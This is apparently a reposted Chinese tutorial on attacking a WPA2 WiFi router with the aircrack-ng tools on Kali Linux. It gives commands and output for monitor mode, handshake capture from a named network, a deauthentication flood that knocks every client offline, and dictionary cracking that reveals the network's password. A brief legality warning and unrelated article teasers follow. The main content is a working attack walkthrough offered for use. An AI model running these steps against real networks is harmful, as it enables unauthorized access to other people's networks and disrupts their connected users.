无线路由攻击和WiFi密码破解实战[渗透技术]

文章目录

    • 一、准备阶段
    • 二、攻击阶段
      • 1.停止🛑网络管理员
      • 2.开启网卡监听模式
      • 3. 捕获数据包
      • 4.获取数据包
      • 5.注入数据包(DeAuth洪水攻击)
      • 5.WiFi密码破解

一、准备阶段

  • 攻击主机:kali Linux
  • 攻击工具:aircrack-ng、airodump-ng、airmon-ng、aireplay-ng
  • 网卡一枚
    在这里插入图片描述
可以通过命令: sudo iwconfig 查看网卡是否已经就绪。

我的网卡名为:wlan0

root@kali:~# iwconfig
lo        no wireless extensions.eth0      no wireless extensions.wlan0     IEEE 802.11  ESSID:off/any  Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   Retry short  long limit:2   RTS thr:off   Fragment thr:offEncryption key:offPower Management:off

二、攻击阶段

1.停止🛑网络管理员

为了防止干扰,我们需要关闭网络管理员

停止🛑网络管理员

sudo service network-manager stop

杀死进程

sudo airmon-ng check kill

2.开启网卡监听模式

开启监听后,就可以通过网卡监听附近的路由设备了。

语法:sudo airmon-ng start 网卡名

例:

sudo airmon-ng start wlan0mon

出现以下形式表示开启成功!

root@kali:~# sudo airmon-ng start wlan0monPHY     Interface       Driver          Chipsetphy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070(mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

开启成功后可以发现网卡名由:wlan0变成了wlan0mon

root@kali:~# iwconfig
lo        no wireless extensions.eth0      no wireless extensions.wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   Retry short  long limit:2   RTS thr:off   Fragment thr:offPower Management:off

3. 捕获数据包

捕获数据包指的是,通过网卡扫描附近的路由器,至于扫描距离的远近,由自己的网卡的质量决定,通过扫描可以得到路由的MAC地址(BSSID )、信道(CH)值、 WiFi的名字、加密的方式等等。

语法: airodump-ng 网卡名

例:

sudo airodump-ng wlan0mon

当看到要攻击的路由WiFi名(靶机)时,按CTRL+C停止,如下图所示:(我要攻击的就是:WiFi名为 CMCC-QingFeng 的路由器 )

root@kali:~# airodump-ng wlan0monCH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57                                                                                            BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                          80:54:6A:6C:BA:C0  -50      407     4907   40   1  130   WPA2 CCMP   PSK  CMCC-QingFeng                                                  BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                        (not associated)   22:C9:4E:48:C1:16  -78    0 - 1      0       12                                                                        80:54:6A:6C:BA:C0  38:37:8B:07:71:69  -18    0e- 6      0      534                                                                       80:54:6A:6C:BA:C0  7C:B3:7B:95:BA:50  -62    0e- 0e     8     2476                                                                       80:54:6A:6C:BA:C0  F4:70:AB:95:A1:14  -78    0e- 1      0     1375                                                                       80:54:6A:6C:BA:C0  70:C9:4E:48:C1:16  -76    0e- 1    396     2485         CMCC-QingFeng                                                 
Quitting...                                                       

4.获取数据包

获取数据包(握手包)的作用主要是为下面的破解做准备。

语法:

sudo airodump-ng -c -w  --bssid  网卡名

参数说明:

  • -c:信道值
  • -w:获取到的数据包的保存路径
  • –bssid:MAC地址

例:

 sudo airodump-ng -c 1 -w /root/admin --bssid  80:54:6A:6C:BA:C0   wlan0mon

在这里插入图片描述

5.注入数据包(DeAuth洪水攻击)

向路由设备连续发送取消认证数据包,此过程中所有连接的设备都会被强制下线。如果可以破解,那么会在第四步终端的右上角显示握手包,文件会保存在你指定的位置。有些加密方式不好被破解,受到很多因素的影响,比如字典的强度主机,总之强大的字典是必不可少的。

语法:

sudo aireplay-ng -0  n	-a	网卡名

参数说明:

  • -0:表示取消认证数据包
  • n:表示攻击次数(向路由器发送数据包的次数)
  • -a:对应的路由器的BSSID
  • 网卡名:自己的网卡的名字,可通过sudo iwconfig查看

例:

第四步终端不要关闭,新建一个终端输入以下代码,就可以实施对路由器的攻击了,这时候你连接此路由器可以发现根本连不上,如果你先前已经连接此路由器,执行下面命令后可以发现客户端被强制下线,时间的长久由攻击次数决定,下面例子中我的攻击次数是5次。

sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
root@kali:~# sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
00:34:39  Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]

注:当你执行上面命令的时候,所有连接上的客户端将统统被强制下线,切记!切记!切记,不要用此去做有关违法的事。

5.WiFi密码破解

这一步是破解密码,至于能不能破解就看你的字典的强度主机牛不牛逼了,还有就是要有耐心等了,哈哈!

语法:aircrack-ng -w 字典路径 has.cap路径

例:

aircrack-ng -w /root/admin/directory/dic1  /root/admin/-01.cap
下面运行结果中可以看到密码已经被成功破解出来了,密码为:guu3nif2(KEY FOUND! [ guu3nif2 ])
root@kali:~/admin# aircrack-ng -w /root/admin/directory/dic1  /root/admin/-01.cap
Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.#  BSSID              ESSID                     Encryption1  80:54:6A:6C:BA:C0  CMCC-QingFeng             WPA (1 handshake)Choosing first network as target.Reading packets, please wait...
Opening /root/admin/-01.cap
Read 165406 packets.1 potential targetsAircrack-ng 1.6 [00:00:00] 1/1 keys tested (13.07 k/s) Time left: --KEY FOUND! [ guu3nif2 ]Master Key     : A7 21 22 70 BA 88 13 33 CE DB 99 89 A3 02 B4 0E 3E 70 BB FF D3 39 DA B0 70 B4 61 08 38 BF 9D 19 Transient Key  : DC 87 B9 63 C4 D8 47 AE 0F 69 3E A3 E9 73 20 6E DC B3 B7 6E DD 68 AB 4A 2F 0B 94 A3 6A 9A 53 2C FA 30 6C 2B C8 8A 1C A8 73 2F 1B DB F8 A9 3D 56 9B 91 3B 23 3D 70 AA 89 B3 02 96 27 D6 86 A4 5F EAPOL HMAC     : 05 48 48 0A CB 6D 82 89 26 93 8B C2 3F 31 0C 86 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/517511.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

支付宝双11狂欢幕后的女程序员:服务全球12亿人,每天和不法分子打攻防战

再过3天&#xff0c;全球最大的购物狂欢节就开始了。 在这个睡不着的午夜&#xff0c;无数男男女女会在闪烁的屏幕前滑屏、抢购、享受秒级付款带来的快感。整个过程大脑分泌的多巴胺&#xff0c;又驱使他们以更快的速度重新填满购物车。 2018年天猫双11成交额2135亿元&#x…

技术直播:程序员副业的修炼指南!(限免报名)

面试造飞机&#xff0c;上班拧螺丝&#xff0c;每天想辞职&#xff0c;但无奈副业还“大器晚成”的样子&#xff01;那可能是你还没有选对副业&#xff01;滴滴 ~福利卡&#xff01;&#xff01;&#xff01;CSDN学院邀请汤小洋老师开设技术直播课《程序员副业之路-三大终极秘籍…

轻松解决Android gradle太慢问题

夫陶公清风千古&#xff0c;余又何人&#xff0c;敢称庶几 一、解决方案 从网上下载对应版本的gradle,然后把gradle压缩包复制到C:\Users\liuxin\.gradle\wrapper\dists\gradle-6.5-all\2oz4ud9k3tuxjg84bbf55q0tn目录下&#xff0c;重新build工程就搞定了。 安卓开发者平台官…

持续交付体系在高德的实践历程

1. 前序 对于工程团队来说&#xff0c;构建一套具有可持续性的、多方面质量保证的交付体系建设&#xff0c;能够为业务价值的快速交付搭建起高速公路&#xff0c;也能为交付过程中的质量起到保驾护航的作用。本文为大家介绍持续交付体系在高德的演进与落地。 2. 持续交付 正…

RuoYi-Cloud 部署篇_01(windows环境 mysql +nginx版本)

文章目录一、基础准备1. 技术选型2. 源码克隆3. 安装依赖4. 将 RuoYi-Cloud 项目导入到 IDEA5. 安装启动Mysql6. 安装启动Redis7. 创建数据库&#xff0c;执行 SQL脚本文件二、安装与配置 nacos2.1. 下载nacos2.2. 安装 nacos2.3. nacos持久化配置2.4. 执行脚本文件2.5. nacos连…

趣头条基于 Flink 的实时平台建设实践

本文由趣头条实时平台负责人席建刚分享趣头条实时平台的建设&#xff0c;整理者叶里君。文章将从平台的架构、Flink 现状&#xff0c;Flink 应用以及未来计划四部分分享。 一&#xff0e;平台架构 1.Flink 应用时间线 首先是平台的架构&#xff0c;2018 年 3 月之前基本都是基…

我!程序猿!被银行套路了!

作者 | 程序猿石头责编 | Carol封图 | CSDN 付费下载自视觉中国话说&#xff0c;你肯定也经常收到各个银行电话推销&#xff0c;可以办理小额贷款/信用卡账单分期/万用金&#xff0c;或者其他乱七八糟的名字的产品。又或者接到电话说&#xff0c;“石头先生&#xff0c;我们有留…

巧妙地在Windows搭建node服务器

夫陶公清风千古&#xff0c;余又何人&#xff0c;敢称庶几 文章目录一、 安装node1. 官网下载node.js2. 测试npm是否成功安装3. 配置npm模块和缓存的存放路径4. 安装express5. 配置npm环境变量二、安装cnpm1.执行安装2. 配置cnpm环境变量一、 安装node 1. 官网下载node.js 官…

jdk8下载

文章目录1. 官网2. windows下载链接3. linux下载链接1. 官网 https://www.oracle.com/cn/java/technologies/javase/javase-jdk8-downloads.html 2. windows下载链接 https://download.oracle.com/otn/java/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/jdk-8u301-window…

测试工程师不懂AI,还有未来吗?

阿里妹导读&#xff1a;近几年人工智能、机器学习等词漫天遍地&#xff0c;似乎有一种无AI&#xff0c;无研发&#xff0c;无AI&#xff0c;无测试的感觉。有人说&#xff1a;不带上“智能”二字&#xff0c;都不好意思说自己是创新。我们先暂且不评论对错&#xff0c;只探讨这…

redis 下载、启动 windows环境

文章目录1. 下载2. 启动1. 下载 https://github.com/MicrosoftArchive/redis/releases 2. 启动 进入redis的bin目录双击redis-server.exe

Aruba发布业界首款服务智能边缘的云原生平台Aruba ESP

利用AI 和自动化技术打造智能网络&#xff1b;支持业务连续性任务&#xff0c;驾驭未来智能边缘 慧与公司旗下的Aruba今日推出业内首款 AI 驱动的云原生平台 Aruba ESP&#xff08;边缘服务平台&#xff09;&#xff0c;该平台建立在AIOps、零信任网络安全和统一架构基础上&am…

axios的安装和使用

文章目录一、axios介绍二、安装axios三、 案例四、框架整合五、插件一、axios介绍 什么是 axios? Axios 是一个基于 promise 的 HTTP 库&#xff0c;可以用在浏览器和 node.js 中。 特性: 1、从浏览器中创建 XMLHttpRequests 2、从 node.js 创建 http 请求 3、支持 Promise AP…

达摩院最新AI技术助力天猫双11,提供接近真人的语音交互体验

11月8日&#xff0c;记者了解到&#xff0c;阿里巴巴达摩院机器智能实验室最新研究成果——KAN-TTS将首次大规模应用于今年天猫双11&#xff0c;基于该技术&#xff0c;菜鸟热线机器人、语音机器人小蜜以及天猫精灵将为全球消费者提供接近真人的语音交互体验。 让机器开口说话…

make[1]: *** [objs/Makefile:445: objs/src/core/ngx_murmurhash.o] Error

执行完make以后报错 make[1]: *** [objs/Makefile:445: objs/src/core/ngx_murmurhash.o] Error 1 make[1]: Leaving directory /app/nginx-1.9.9 make: *** [Makefile:8: build] Error 2解决办法 找到对应的Maakefile文件&#xff08;我的在 /nginx/objs/Makefile&#xff09…

原来记录系统日志那么简单【Java】【SpringBoot】【Mybatis Plus】【AspcetJ】

夫陶公清风千古&#xff0c;余又何人&#xff0c;敢称庶几 文章目录前言一、系统日志是什么二、开发技术三、开发步骤3.1引入依赖坐标3.1.1 导入Lombok3.1.2 数据库连接依赖3.1.3 spring aop依赖3.1.4 aspectJ依赖3.1.5 Druid连接池&#xff08;阿里巴巴&#xff09;3.1.6 myb…

程序员风光背后:从零到今日头条数据分析师,我走了1年!

笔者最近在今日头条上&#xff0c;看到了头条员工的自述&#xff1a;“从什么都不懂的小白&#xff0c;到入职头条成为数据分析工程师&#xff0c;我走了1年的时间。”评论区却炸锅了&#xff01;大家不明白&#xff0c;1年时间为什么要学这个&#xff1f;半年时间学Java不香吗…

前端内存优化的探索与实践

引言 标注是地图最基本的元素之一&#xff0c;标明了地图每个位置或线路的名称。在地图 JSAPI 中&#xff0c;标注的展示效果及性能也是需要重点解决的问题。 新版地图标注的设计中&#xff0c;引入了 SDF &#xff08; signed distance field&#xff09;重构了整个标注部分…

直播:AI时代,普通程序员该如何转人工智能(限免报名)

常常有小伙伴在后台反馈&#xff1a;想了解人工智能&#xff0c;但是该怎么学&#xff1f;自学难度大又没有效果&#xff0c;该怎么办&#xff1f;CSDN为了解决这个难题&#xff0c;联合唐宇迪老师为大家带来了一场精彩的直播【年薪百万AI工程师亲授&#xff1a;小白实战培养计…

核心系统100%上云!全球最大流量洪峰,阿里云扛住了

2019天猫双11 96秒成交额破100亿 全球最大流量洪峰 每秒订单峰值54.4万笔 阿里巴巴核心系统 100%上云 我们扛住了&#xff01; 1心1役 把不可能变成可能 今晚为阿里工程师疯狂打call&#xff01; 原文链接 本文为云栖社区原创内容&#xff0c;未经允许不得转载。